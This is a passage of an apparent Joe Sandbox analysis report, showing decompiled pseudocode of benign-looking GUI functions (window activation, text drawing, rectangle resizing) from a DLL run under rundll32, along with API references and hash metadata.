				intOrPtr* _t163;
				void* _t164;

				_t163 = __ecx;
				_t57 = E1000AB19(_t121, _t156, __ecx, __eflags);
				_t122 = 0;
				_v16 =  *((intOrPtr*)(_t57 + 4));
				if(_a4 == 0) {
					_t157 = _t163 + 0xc4;
					_t59 =  *_t157;
					__eflags = _t59;
					if(_t59 == 0) {
						_t61 =  *((intOrPtr*)( *_t163 + 0x60))();
						__eflags = _t61;
						_v8 = _t61;
						if(_t61 == 0) {
							L41:
							_t158 =  *((intOrPtr*)(_v16 + 0x20));
							_t63 = E1002B674();
							__eflags = _t63;
							if(_t63 == 0) {
								__eflags = _t158 - _t122;
								if(_t158 != _t122) {
									_t65 = E1001175A(_t158);
									__eflags = _t65;
									if(_t65 != 0) {
										_t67 =  *((intOrPtr*)( *_t158 + 0x120))();
										__eflags = _t67;
										if(_t67 != 0) {
											_t69 =  *((intOrPtr*)( *_t158 + 0x140))();
											__eflags = _t69 - _t158;
											if(_t69 == _t158) {
												E10028247(_v16);
											}
										}
									}
								}
							}
							goto L47;
						}
						_v20 = E1001D52D(_t163, _t163);
						_v12 = 0;
						_t123 =  *((intOrPtr*)( *_t163 + 0x64))( &_v8);
						do {
							_t135 = _t123;
							_t160 = E1000EFFA(_t123);
							__eflags = _t160;
							if(__eflags != 0) {
								L27:
								_t123 =  *((intOrPtr*)( *_t163 + 0x64))( &_v8);
								__eflags = _t123;
								if(_t123 != 0) {
									L26:
									_t77 = E1000EFFA(_t123);
									__eflags = _t77 - _t160;
									if(_t77 != _t160) {
										goto L28;
									}
									goto L27;
								}
								L28:
								_t78 = E1000EFFA(_t160);
								__eflags = _t78;
								if(_t78 == 0) {
									L31:
									 *((intOrPtr*)( *_t163 + 0x94))(_t160);
									__eflags = _v20 - _t160;
									_t81 =  *_t160;
									if(_v20 != _t160) {
										 *((intOrPtr*)(_t81 + 0x60))();
									} else {
										 *((intOrPtr*)(_t81 + 0x14c))(0);
									}
									_t160 = _v12;
									goto L35;
								}
								_t89 =  *((intOrPtr*)( *_t78 + 0x140))();
								__eflags = _t89 - _t160;
								if(_t89 != _t160) {
									goto L31;
								}
								_v12 = _t160;
								goto L35;
							}
							E1000836F(_t123, _t135, _t160, _t163, __eflags);
							goto L26;
							L35:
							__eflags = _t123;
						} while (_t123 != 0);
						__eflags = _t160;
						if(_t160 != 0) {
							 *((intOrPtr*)( *_t163 + 0x94))(_t160);
							__eflags = _v20 - _t160;
							_t85 =  *_t160;
							if(_v20 != _t160) {
								 *((intOrPtr*)(_t85 + 0x60))();
							} else {
								 *((intOrPtr*)(_t85 + 0x14c))(_t123);
							}
						}
						_t122 = 0;
						__eflags = 0;
						goto L41;
					}
					__eflags =  *(_t59 + 0xd4);
					if( *(_t59 + 0xd4) != 0) {
						_t59 =  *((intOrPtr*)( *_t163 + 0x10c))(0);
					}
					_t145 =  *_t157;
					__eflags = _t145 - _t122;
					if(_t145 == _t122) {
						goto L53;
					} else {
						return  *((intOrPtr*)( *_t145 + 0x14c))(_t122);
					}
				} else {
					if( *(_t163 + 0xc4) != 0) {
						 *((intOrPtr*)( *_t163 + 0x108))();
					}
					_t147 = _t163;
					_t161 = E1001D52D(_t163, _t163);
					if(_t161 == _t122) {
						_t95 = _v16;
						__eflags =  *((intOrPtr*)(_t95 + 0x20)) - _t122;
						if( *((intOrPtr*)(_t95 + 0x20)) != _t122) {
							_t162 = E10009B1B();
							_t98 = IsWindowVisible( *(_t162 + 0x20));
							__eflags = _t98;
							if(_t98 == 0) {
								_t103 =  *(_t163 + 0xb0);
								__eflags = _t103 - _t122;
								if(_t103 != _t122) {
									 *((intOrPtr*)( *_t103 + 0x18))(_t103);
								}
							}
							_t147 = _t162;
							E10011739(_t162, 5);
							E1000E5E5(_t122, _t162, _t164, SetActiveWindow( *(_t162 + 0x20)));
							SetForegroundWindow( *(_t162 + 0x20));
						}
					} else {
						if(IsWindowVisible( *(_t161 + 0x20)) == 0) {
							_t117 =  *(_t163 + 0xb0);
							if(_t117 != _t122) {
								 *((intOrPtr*)( *_t117 + 0x18))(_t117);
							}
						}
						 *((intOrPtr*)( *_t161 + 0x14c))(0xffffffff);
						_t150 = _t161;
						_t108 = E1000EFFA(_t161);
						if(_t108 != _t122) {
							_t150 = _t108;
							_t161 = _t108;
							 *((intOrPtr*)( *_t108 + 0x14c))(0xffffffff);
						}
						SetForegroundWindow( *(E1000E5E5(_t122, _t150, _t164, GetLastActivePopup( *(_t161 + 0x20))) + 0x20));
						 *((intOrPtr*)( *_t161 + 0x164))(_t122);
						_t147 = _t161;
						 *((intOrPtr*)( *_t161 + 0x160))(1);
					}
					if( *((intOrPtr*)(_t163 + 0x50)) == _t122) {
						E1002B665(_t147, 1);
					}
					L47:
					_t59 =  *(_t163 + 0xb0);
					if(_t59 == _t122) {
						L51:
						if(_a4 == _t122) {
							L53:
							return _t59;
						}
						return E1001EA0F(_t163, _t164, 1, _t122);
					}
					_t159 = _a4;
					if(_t159 != _t122 ||  *((intOrPtr*)(_t163 + 0xb8)) != _t122) {
						_t59 =  *((intOrPtr*)( *_t59 + 0x1c))(_t59, _t159);
						 *((intOrPtr*)(_t163 + 0xb8)) = _t159;
						goto L51;
					} else {
						goto L53;
					}
				}
			}









































                                                                                                        0x10018b1c
                                                                                                        0x10018b1e
                                                                                                        0x10018b26
                                                                                                        0x10018b2b
                                                                                                        0x10018b2e
                                                                                                        0x10018c28
                                                                                                        0x10018c2e
                                                                                                        0x10018c30
                                                                                                        0x10018c32
                                                                                                        0x10018c63
                                                                                                        0x10018c66
                                                                                                        0x10018c68
                                                                                                        0x10018c6b
                                                                                                        0x10018d25
                                                                                                        0x10018d28
                                                                                                        0x10018d2b
                                                                                                        0x10018d30
                                                                                                        0x10018d32
                                                                                                        0x10018d34
                                                                                                        0x10018d36
                                                                                                        0x10018d3a
                                                                                                        0x10018d3f
                                                                                                        0x10018d41
                                                                                                        0x10018d47
                                                                                                        0x10018d4d
                                                                                                        0x10018d4f
                                                                                                        0x10018d55
                                                                                                        0x10018d5b
                                                                                                        0x10018d5d
                                                                                                        0x10018d62
                                                                                                        0x10018d62
                                                                                                        0x10018d5d
                                                                                                        0x10018d4f
                                                                                                        0x10018d41
                                                                                                        0x10018d36
                                                                                                        0x00000000
                                                                                                        0x10018d32
                                                                                                        0x10018c7b
                                                                                                        0x10018c83
                                                                                                        0x10018c89
                                                                                                        0x10018c8b
                                                                                                        0x10018c8b
                                                                                                        0x10018c92
                                                                                                        0x10018c94
                                                                                                        0x10018c96
                                                                                                        0x10018ca8
                                                                                                        0x10018cb3
                                                                                                        0x10018cb5
                                                                                                        0x10018cb7
                                                                                                        0x10018c9d
                                                                                                        0x10018c9f
                                                                                                        0x10018ca4
                                                                                                        0x10018ca6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018ca6
                                                                                                        0x10018cb9
                                                                                                        0x10018cbb
                                                                                                        0x10018cc0
                                                                                                        0x10018cc2
                                                                                                        0x10018cd7
                                                                                                        0x10018cdc
                                                                                                        0x10018ce2
                                                                                                        0x10018ce5
                                                                                                        0x10018ce9
                                                                                                        0x10018cf5
                                                                                                        0x10018ceb
                                                                                                        0x10018ced
                                                                                                        0x10018ced
                                                                                                        0x10018cf8
                                                                                                        0x00000000
                                                                                                        0x10018cf8
                                                                                                        0x10018cc8
                                                                                                        0x10018cce
                                                                                                        0x10018cd0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018cd2
                                                                                                        0x00000000
                                                                                                        0x10018cd2
                                                                                                        0x10018c98
                                                                                                        0x00000000
                                                                                                        0x10018cfb
                                                                                                        0x10018cfb
                                                                                                        0x10018cfb
                                                                                                        0x10018cff
                                                                                                        0x10018d01
                                                                                                        0x10018d08
                                                                                                        0x10018d0e
                                                                                                        0x10018d11
                                                                                                        0x10018d15
                                                                                                        0x10018d20
                                                                                                        0x10018d17
                                                                                                        0x10018d18
                                                                                                        0x10018d18
                                                                                                        0x10018d15
                                                                                                        0x10018d23
                                                                                                        0x10018d23
                                                                                                        0x00000000
                                                                                                        0x10018d23
                                                                                                        0x10018c34
                                                                                                        0x10018c3a
                                                                                                        0x10018c41
                                                                                                        0x10018c41
                                                                                                        0x10018c47
                                                                                                        0x10018c49
                                                                                                        0x10018c4b
                                                                                                        0x00000000
                                                                                                        0x10018c51
                                                                                                        0x00000000
                                                                                                        0x10018c54
                                                                                                        0x10018b34
                                                                                                        0x10018b3a
                                                                                                        0x10018b40
                                                                                                        0x10018b40
                                                                                                        0x10018b46
                                                                                                        0x10018b4d
                                                                                                        0x10018b51
                                                                                                        0x10018bc6
                                                                                                        0x10018bc9
                                                                                                        0x10018bcc
                                                                                                        0x10018bd3
                                                                                                        0x10018bd8
                                                                                                        0x10018bde
                                                                                                        0x10018be0
                                                                                                        0x10018be2
                                                                                                        0x10018be8
                                                                                                        0x10018bea
                                                                                                        0x10018bef
                                                                                                        0x10018bef
                                                                                                        0x10018bea
                                                                                                        0x10018bf4
                                                                                                        0x10018bf6
                                                                                                        0x10018c05
                                                                                                        0x10018c0d
                                                                                                        0x10018c0d
                                                                                                        0x10018b53
                                                                                                        0x10018b5e
                                                                                                        0x10018b60
                                                                                                        0x10018b68
                                                                                                        0x10018b6d
                                                                                                        0x10018b6d
                                                                                                        0x10018b68
                                                                                                        0x10018b76
                                                                                                        0x10018b7c
                                                                                                        0x10018b7e
                                                                                                        0x10018b85
                                                                                                        0x10018b8b
                                                                                                        0x10018b8d
                                                                                                        0x10018b8f
                                                                                                        0x10018b8f
                                                                                                        0x10018ba7
                                                                                                        0x10018bb2
                                                                                                        0x10018bbc
                                                                                                        0x10018bbe
                                                                                                        0x10018bbe
                                                                                                        0x10018c16
                                                                                                        0x10018c1e
                                                                                                        0x10018c1e
                                                                                                        0x10018d67
                                                                                                        0x10018d67
                                                                                                        0x10018d6f
                                                                                                        0x10018d8d
                                                                                                        0x10018d90
                                                                                                        0x10018da0
                                                                                                        0x10018da0
                                                                                                        0x10018da0
                                                                                                        0x00000000
                                                                                                        0x10018d97
                                                                                                        0x10018d71
                                                                                                        0x10018d76
                                                                                                        0x10018d84
                                                                                                        0x10018d87
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10018d76

                                                                                                        APIs
                                                                                                        • IsWindowVisible.USER32 ref: 10018B56
                                                                                                        • GetLastActivePopup.USER32(?), ref: 10018B98
                                                                                                        • SetForegroundWindow.USER32(?,00000000), ref: 10018BA7
                                                                                                        • IsWindowVisible.USER32 ref: 10018BD8
                                                                                                        • SetActiveWindow.USER32(?,00000005), ref: 10018BFE
                                                                                                        • SetForegroundWindow.USER32(?,00000000), ref: 10018C0D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$ActiveForegroundVisible$LastPopup
                                                                                                        • String ID:
                                                                                                        • API String ID: 3684474681-0
                                                                                                        • Opcode ID: 5f97f5748719ef74b8b1dcd9681d8bdbf897a9fca772648b8d725f5bd139dfcf
                                                                                                        • Instruction ID: e5432f3983a8165f3984dfe762964b39db488d952a10cb5b933ede7e412970d6
                                                                                                        • Opcode Fuzzy Hash: 5f97f5748719ef74b8b1dcd9681d8bdbf897a9fca772648b8d725f5bd139dfcf
                                                                                                        • Instruction Fuzzy Hash: 83814B357006469FCB05DF64C898A6D77F6FF88384B220579E5469F2A1EB30EF818B90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1002E9D3, Relevance: 9.1, APIs: 6, Instructions: 148COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 97%
                                                                                                        			E1002E9D3(void* __ecx, intOrPtr* _a4, signed int _a8, int _a12, CHAR* _a16, char _a20, intOrPtr _a24, intOrPtr* _a28, intOrPtr _a32) {
				char* _v8;
				int _v12;
				signed int _v16;
				struct tagSIZE _v24;
				struct tagTEXTMETRICA _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t70;
				signed int _t71;
				struct HDC__* _t72;
				intOrPtr* _t73;
				int _t81;
				char* _t85;
				signed int _t87;
				signed int _t94;
				int _t96;
				char _t98;
				void* _t99;
				intOrPtr* _t101;
				intOrPtr _t103;
				signed int _t105;
				int _t109;
				intOrPtr* _t110;
				int _t111;
				void* _t112;
				int _t113;
				char _t125;
				void* _t132;

				_t100 = __ecx;
				_t99 = __ecx;
				_t109 = 0;
				_t116 =  *((intOrPtr*)(__ecx + 4));
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					L1:
					E1000836F(_t99, _t100, _t109, _t112, _t116);
				}
				if( *(_t99 + 8) == _t109 || _a16 == _t109) {
					goto L1;
				}
				if(_a20 == 0xffffffff) {
					_t98 = E1003EA30(_a16);
					_pop(_t100);
					if(_t98 >= 0x7fffffff) {
						goto L1;
					} else {
						_a20 = _t98;
					}
				}
				_t113 = _a8;
				_v12 = _t113;
				_a8 = _t109;
				_t70 = GetTabbedTextExtentA( *(_t99 + 8), 0x1005c05c, 1, _t109, _t109);
				_t101 = _a28;
				_t71 = _t70 & 0x0000ffff;
				_v16 = _t71;
				if(_t101 == _t109) {
					L10:
					_a8 = _t71;
				} else {
					_t71 = 1;
					if(_a24 == 1) {
						_t105 =  *_t101;
						_a8 = _t105;
						if(_t105 == _t109) {
							goto L10;
						}
					}
				}
				if(_a20 != _t109) {
					do {
						_t110 = _a16;
						_t125 = _a20;
						while(1) {
							_v8 = _t110;
							if(_t125 == 0) {
								break;
							}
							_t81 =  *_t110;
							__eflags = _t81 - 9;
							if(_t81 != 9) {
								__eflags = _t81;
								if(_t81 != 0) {
									_t96 = E1003F562(_t81);
									__eflags = _t96;
									if(_t96 != 0) {
										_t110 = _t110 + 1;
										_t19 =  &_a20;
										 *_t19 = _a20 - 1;
										__eflags =  *_t19;
									}
									_t110 = _t110 + 1;
									_t21 =  &_a20;
									 *_t21 = _a20 - 1;
									__eflags =  *_t21;
									continue;
								}
							}
							break;
						}
						_t111 = _t110 - _a16;
						TextOutA( *(_t99 + 4), _t113, _a12, _a16, _t111);
						GetTextExtentPoint32A( *(_t99 + 8), _a16, _t111,  &_v24);
						_t113 = _t113 + _v24.cx;
						if(_a20 != 0) {
							_t85 = _v8;
							if( *_t85 != 0) {
								_a20 = _a20 - 1;
								_a16 = _t85 + 1;
								_t87 = 0;
								if(_a8 != 0) {
									L30:
									asm("cdq");
									_t113 = ((_t113 - _a32) / _a8 + 1) * _a8 + _a32;
								} else {
									if(0 < _a24) {
										while(1) {
											_t103 = _a28;
											if(_t113 <  *((intOrPtr*)(_t103 + _t87 * 4)) + _a32) {
												break;
											}
											_t87 = _t87 + 1;
											if(_t87 < _a24) {
												continue;
											} else {
											}
											L27:
											_t132 = _t87 - _a24;
											goto L28;
										}
										_t113 =  *((intOrPtr*)(_t103 + _t87 * 4)) + _a32;
										__eflags = _t113;
										goto L27;
									}
									L28:
									if(_t132 == 0) {
										_t94 = _v16;
										_a8 = _t94;
										if(_t94 != 0) {
											goto L30;
										}
									}
								}
							}
							goto L31;
						}
						break;
						L31:
					} while (_a20 != 0);
					_t109 = 0;
				}
				_t72 =  *(_t99 + 8);
				if(_t72 != _t109 && (GetTextAlign(_t72) & 0x00000001) != 0) {
					GetTextMetricsA( *(_t99 + 8),  &_v80);
					E1002E660(_t99, _t113 - _v80.tmOverhang - _v12);
				}
				_t73 = _a4;
				 *_t73 = _t113 - _v12;
				return _t73;
			}

































                                                                                                        0x1002e9d3
                                                                                                        0x1002e9dc
                                                                                                        0x1002e9de
                                                                                                        0x1002e9e0
                                                                                                        0x1002e9e3
                                                                                                        0x1002e9e5
                                                                                                        0x1002e9e5
                                                                                                        0x1002e9e5
                                                                                                        0x1002e9ed
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002e9f8
                                                                                                        0x1002e9fd
                                                                                                        0x1002ea07
                                                                                                        0x1002ea08
                                                                                                        0x00000000
                                                                                                        0x1002ea0a
                                                                                                        0x1002ea0a
                                                                                                        0x1002ea0a
                                                                                                        0x1002ea08
                                                                                                        0x1002ea0d
                                                                                                        0x1002ea1c
                                                                                                        0x1002ea1f
                                                                                                        0x1002ea22
                                                                                                        0x1002ea28
                                                                                                        0x1002ea2d
                                                                                                        0x1002ea30
                                                                                                        0x1002ea33
                                                                                                        0x1002ea46
                                                                                                        0x1002ea46
                                                                                                        0x1002ea35
                                                                                                        0x1002ea37
                                                                                                        0x1002ea3b
                                                                                                        0x1002ea3d
                                                                                                        0x1002ea41
                                                                                                        0x1002ea44
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002ea44
                                                                                                        0x1002ea3b
                                                                                                        0x1002ea4c
                                                                                                        0x1002ea52
                                                                                                        0x1002ea52
                                                                                                        0x1002ea55
                                                                                                        0x1002ea7b
                                                                                                        0x1002ea7b
                                                                                                        0x1002ea7e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002ea5b
                                                                                                        0x1002ea5d
                                                                                                        0x1002ea5f
                                                                                                        0x1002ea61
                                                                                                        0x1002ea63
                                                                                                        0x1002ea69
                                                                                                        0x1002ea6e
                                                                                                        0x1002ea71
                                                                                                        0x1002ea73
                                                                                                        0x1002ea74
                                                                                                        0x1002ea74
                                                                                                        0x1002ea74
                                                                                                        0x1002ea74
                                                                                                        0x1002ea77
                                                                                                        0x1002ea78
                                                                                                        0x1002ea78
                                                                                                        0x1002ea78
                                                                                                        0x00000000
                                                                                                        0x1002ea78
                                                                                                        0x1002ea63
                                                                                                        0x00000000
                                                                                                        0x1002ea5f
                                                                                                        0x1002ea80
                                                                                                        0x1002ea8e
                                                                                                        0x1002ea9f
                                                                                                        0x1002eaa5
                                                                                                        0x1002eaac
                                                                                                        0x1002eaae
                                                                                                        0x1002eab4
                                                                                                        0x1002eab7
                                                                                                        0x1002eaba
                                                                                                        0x1002eabd
                                                                                                        0x1002eac2
                                                                                                        0x1002eaf3
                                                                                                        0x1002eaf8
                                                                                                        0x1002eb04
                                                                                                        0x1002eac4
                                                                                                        0x1002eac7
                                                                                                        0x1002eac9
                                                                                                        0x1002eac9
                                                                                                        0x1002ead4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002ead6
                                                                                                        0x1002eada
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002eadc
                                                                                                        0x1002eae4
                                                                                                        0x1002eae4
                                                                                                        0x00000000
                                                                                                        0x1002eae4
                                                                                                        0x1002eae1
                                                                                                        0x1002eae1
                                                                                                        0x00000000
                                                                                                        0x1002eae1
                                                                                                        0x1002eae7
                                                                                                        0x1002eae7
                                                                                                        0x1002eae9
                                                                                                        0x1002eaee
                                                                                                        0x1002eaf1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002eaf1
                                                                                                        0x1002eae7
                                                                                                        0x1002eac2
                                                                                                        0x00000000
                                                                                                        0x1002eab4
                                                                                                        0x00000000
                                                                                                        0x1002eb06
                                                                                                        0x1002eb06
                                                                                                        0x1002eb10
                                                                                                        0x1002eb10
                                                                                                        0x1002eb12
                                                                                                        0x1002eb17
                                                                                                        0x1002eb2b
                                                                                                        0x1002eb3c
                                                                                                        0x1002eb3c
                                                                                                        0x1002eb44
                                                                                                        0x1002eb48
                                                                                                        0x1002eb4d

                                                                                                        APIs
                                                                                                        • _strlen.LIBCMT ref: 1002E9FD
                                                                                                        • GetTabbedTextExtentA.USER32(?,1005C05C,00000001,00000000,00000000), ref: 1002EA22
                                                                                                        • TextOutA.GDI32(?,?,?,?,?), ref: 1002EA8E
                                                                                                        • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 1002EA9F
                                                                                                        • GetTextAlign.GDI32(?), ref: 1002EB1A
                                                                                                          • Part of subcall function 1000836F: __CxxThrowException@8.LIBCMT ref: 10008383
                                                                                                          • Part of subcall function 1000836F: __EH_prolog3.LIBCMT ref: 10008390
                                                                                                        • GetTextMetricsA.GDI32(?,?), ref: 1002EB2B
                                                                                                          • Part of subcall function 1003F562: x_ismbbtype_l.LIBCMT ref: 1003F56C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Text$Extent$AlignException@8H_prolog3MetricsPoint32TabbedThrow_strlenx_ismbbtype_l
                                                                                                        • String ID:
                                                                                                        • API String ID: 3367633852-0
                                                                                                        • Opcode ID: c3bb8c9d2d4c682228e4a605d05c8c0fa66a381b67f1adb36174f4343c654057
                                                                                                        • Instruction ID: 5730b9697f6dc4124ef02e7632a94da694937c7aacf4e4627c43c9cdfa828f69
                                                                                                        • Opcode Fuzzy Hash: c3bb8c9d2d4c682228e4a605d05c8c0fa66a381b67f1adb36174f4343c654057
                                                                                                        • Instruction Fuzzy Hash: 6951663194018ADFCF01CF64E884A9E7BB9FF44391F558166FC55AB291D330AD91CBA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 100384B3, Relevance: 9.1, APIs: 6, Instructions: 144COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 92%
                                                                                                        			E100384B3(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _t81;
				int _t83;
				int _t90;
				intOrPtr _t92;
				intOrPtr _t111;
				int _t125;
				void* _t134;
				void* _t139;
				intOrPtr _t143;
				void* _t145;
				void* _t149;

				_t145 = __edi;
				_t134 = __ecx;
				_t81 = _a4 -  *((intOrPtr*)(__ecx + 4));
				_t139 = _a8 -  *((intOrPtr*)(__ecx + 8));
				_t143 =  *((intOrPtr*)(__ecx + 0x8c));
				_t149 = 2;
				if(_t143 == 0xa) {
					L7:
					 *((intOrPtr*)(_t134 + 0x28)) =  *((intOrPtr*)(_t134 + 0x28)) + _t81;
					L9:
					_t83 =  *((intOrPtr*)(_t134 + 0x30)) -  *((intOrPtr*)(_t134 + 0x28));
					__eflags = _t83;
					L10:
					if(_t83 < 0) {
						_t83 = 0;
					}
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x68)))) + 0x138))( &_v12, _t83, _t149, _t145);
					_v44.left = GetSystemMetrics(0x4c);
					_v44.top = GetSystemMetrics(0x4d);
					_v44.right = GetSystemMetrics(0x4e) + _v44.left;
					_t90 = GetSystemMetrics(0x4f);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v44.bottom = _t90 + _v44.top;
					_t92 =  *((intOrPtr*)(_t134 + 0x8c));
					asm("movsd");
					if(_t92 == 0xa || _t92 == 0xc) {
						_v28.left =  *((intOrPtr*)(_t134 + 0x58)) -  *((intOrPtr*)(_t134 + 0x60)) - _v12 + _v28.right;
						_v28.top =  *((intOrPtr*)(_t134 + 0x5c)) -  *((intOrPtr*)(_t134 + 0x64)) - _v8 + _v28.bottom;
						__eflags = IntersectRect( &_v60,  &_v44,  &_v28);
						if(__eflags != 0) {
							 *((intOrPtr*)(_t134 + 0x38)) =  *((intOrPtr*)(_t134 + 0x40)) - _v12;
							_t111 =  *((intOrPtr*)(_t134 + 0x44)) - _v8;
							__eflags = _t111;
							 *((intOrPtr*)(_t134 + 0x3c)) = _t111;
							 *(_t134 + 0x48) = _v28.left;
							 *((intOrPtr*)(_t134 + 0x4c)) = _v28.top;
						}
					} else {
						_v28.right =  *((intOrPtr*)(_t134 + 0x60)) -  *((intOrPtr*)(_t134 + 0x58)) + _v28.left + _v12;
						_v28.bottom =  *((intOrPtr*)(_t134 + 0x64)) -  *((intOrPtr*)(_t134 + 0x5c)) + _v28.top + _v8;
						_t125 = IntersectRect( &_v60,  &_v44,  &_v28);
						_t162 = _t125;
						if(_t125 != 0) {
							 *((intOrPtr*)(_t134 + 0x40)) =  *((intOrPtr*)(_t134 + 0x38)) + _v12;
							 *((intOrPtr*)(_t134 + 0x44)) =  *((intOrPtr*)(_t134 + 0x3c)) + _v8;
							 *((intOrPtr*)(_t134 + 0x50)) = _v28.right;
							 *((intOrPtr*)(_t134 + 0x54)) = _v28.bottom;
						}
					}
					 *((intOrPtr*)(_t134 + 4)) = _a4;
					 *((intOrPtr*)(_t134 + 8)) = _a8;
					return E100382A4(_t134, _t162, 0);
				}
				if(_t143 == 0xb) {
					__eflags = _t143 - 0xa;
					if(_t143 != 0xa) {
						_t14 = __ecx + 0x30;
						 *_t14 =  *((intOrPtr*)(__ecx + 0x30)) + _t81;
						__eflags =  *_t14;
						goto L9;
					}
					goto L7;
				} else {
					_t149 = 0x22;
					if(_t143 != 0xc) {
						_t8 = __ecx + 0x34;
						 *_t8 =  *((intOrPtr*)(__ecx + 0x34)) + _t139;
						__eflags =  *_t8;
					} else {
						 *((intOrPtr*)(__ecx + 0x2c)) =  *((intOrPtr*)(__ecx + 0x2c)) + _t139;
					}
					_t83 =  *((intOrPtr*)(_t134 + 0x34)) -  *((intOrPtr*)(_t134 + 0x2c));
					goto L10;
				}
			}



















                                                                                                        0x100384b3
                                                                                                        0x100384bd
                                                                                                        0x100384c5
                                                                                                        0x100384cb
                                                                                                        0x100384cd
                                                                                                        0x100384d8
                                                                                                        0x100384d9
                                                                                                        0x100384fd
                                                                                                        0x100384fd
                                                                                                        0x10038505
                                                                                                        0x10038508
                                                                                                        0x10038508
                                                                                                        0x1003850b
                                                                                                        0x1003850d
                                                                                                        0x1003850f
                                                                                                        0x1003850f
                                                                                                        0x1003851d
                                                                                                        0x1003852f
                                                                                                        0x10038536
                                                                                                        0x10038540
                                                                                                        0x10038543
                                                                                                        0x1003854e
                                                                                                        0x1003854f
                                                                                                        0x10038550
                                                                                                        0x10038551
                                                                                                        0x10038554
                                                                                                        0x1003855d
                                                                                                        0x1003855f
                                                                                                        0x100385c6
                                                                                                        0x100385d5
                                                                                                        0x100385ea
                                                                                                        0x100385ec
                                                                                                        0x100385f4
                                                                                                        0x100385fa
                                                                                                        0x100385fa
                                                                                                        0x100385fd
                                                                                                        0x10038603
                                                                                                        0x10038609
                                                                                                        0x10038609
                                                                                                        0x10038566
                                                                                                        0x10038572
                                                                                                        0x10038581
                                                                                                        0x10038590
                                                                                                        0x10038596
                                                                                                        0x10038598
                                                                                                        0x100385a0
                                                                                                        0x100385a9
                                                                                                        0x100385af
                                                                                                        0x100385b5
                                                                                                        0x100385b5
                                                                                                        0x10038598
                                                                                                        0x1003860f
                                                                                                        0x10038619
                                                                                                        0x10038624
                                                                                                        0x10038624
                                                                                                        0x100384de
                                                                                                        0x100384f8
                                                                                                        0x100384fb
                                                                                                        0x10038502
                                                                                                        0x10038502
                                                                                                        0x10038502
                                                                                                        0x00000000
                                                                                                        0x10038502
                                                                                                        0x00000000
                                                                                                        0x100384e0
                                                                                                        0x100384e5
                                                                                                        0x100384e6
                                                                                                        0x100384ed
                                                                                                        0x100384ed
                                                                                                        0x100384ed
                                                                                                        0x100384e8
                                                                                                        0x100384e8
                                                                                                        0x100384e8
                                                                                                        0x100384f3
                                                                                                        0x00000000
                                                                                                        0x100384f3

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MetricsSystem$IntersectRect
                                                                                                        • String ID:
